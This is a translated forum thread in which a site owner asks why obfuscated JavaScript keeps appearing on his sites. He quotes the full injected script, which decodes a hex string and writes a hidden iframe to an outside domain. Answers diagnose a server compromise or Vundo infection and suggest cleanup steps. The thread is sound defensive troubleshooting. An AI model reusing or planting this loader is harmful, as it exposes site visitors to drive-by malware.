Javascript "Вирус"

Question

У меня проблема с некоторыми вирусами JS на всех моих сайтах. Они находятся на разных хостингах, и на некоторых из них появляется этот код.

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32 блокирует сайт, потому что он считает, что существует вирус. Удаление кода из источников не помогает, потому что он появляется снова. Это не может быть результатом XSS, потому что это появляется даже на статических сайтах.

Я попытался выполнить полную проверку своей системы, но это не помогло. Единственная вещь, которая есть на всех веб-сайтах, - это Google Analytics, которая, я думаю, не может вызвать это.

edit: Вы можете увидеть его, например, на http://www.postuj.cz/test/ или на http://flavicius.php5.cz/.

Answer 1

Они находятся на разных хостингах, и на каком-то из них появляется этот код.

Является ли код одинаковым на каждом хосте? Можете ли вы привести пример одного из затронутых доменов, чтобы мы могли проверить, существует ли код на стороне сервера, а не только на вашем компьютере (что обычно маловероятно).

Код, который вы разместили, безусловно, очень подозрительный. После декодирования он записывает iframe в http://​ecom.rarebreedfootwear.com/? (пытается добавить к URL случайное число кэббастера, но не удается из-за опечатки).

По этому адресу явно нет эксплойта - возможно, последний эксплойт цели еще не установлен, или это просто тестовый запуск для реальной атаки позже, но на вашем сайте появляется неожиданный JavaScript, который декодирует себя и добавляет в фрейме огромный красный флаг. Обычно это означает, что ваш сервер был взломан и нуждается в переустановке с нуля с новыми паролями.

ETA:

вы можете увидеть это, например, по адресу hxxp: //flavicius.php5.cz/

Спасибо. Я удалил комментарий, чтобы скрыть рабочий URL, потому что он действительно заражен. На уровне приложения или самого Apache неясно, но на каждой странице внизу есть подозрительный скрипт.

Таким образом, по крайней мере, приложение и предположительно сервер взломаны и должны быть отключены для очистки, переустановки и диагностики: вам нужно выяснить, как проникли злоумышленники, чтобы это больше не повторилось. На первый взгляд, убедитесь, что у вас установлена ​​последняя версия WordPress, поскольку в прошлом у нее было много дыр в безопасности.

Answer 2

Похоже на Вундо или его вариант. Эта вредоносная программа имеет тенденцию вставлять на сайты бессмысленный JavaScript-код (с вашей стороны, а не на стороне сервера). Я бы предложил попробовать Malwarebytes 'Anti-Malware . Установите его, обновите и выполните полное сканирование. Если это не помогло, возможно, попробуйте изучить варианты удаления Vundo специально.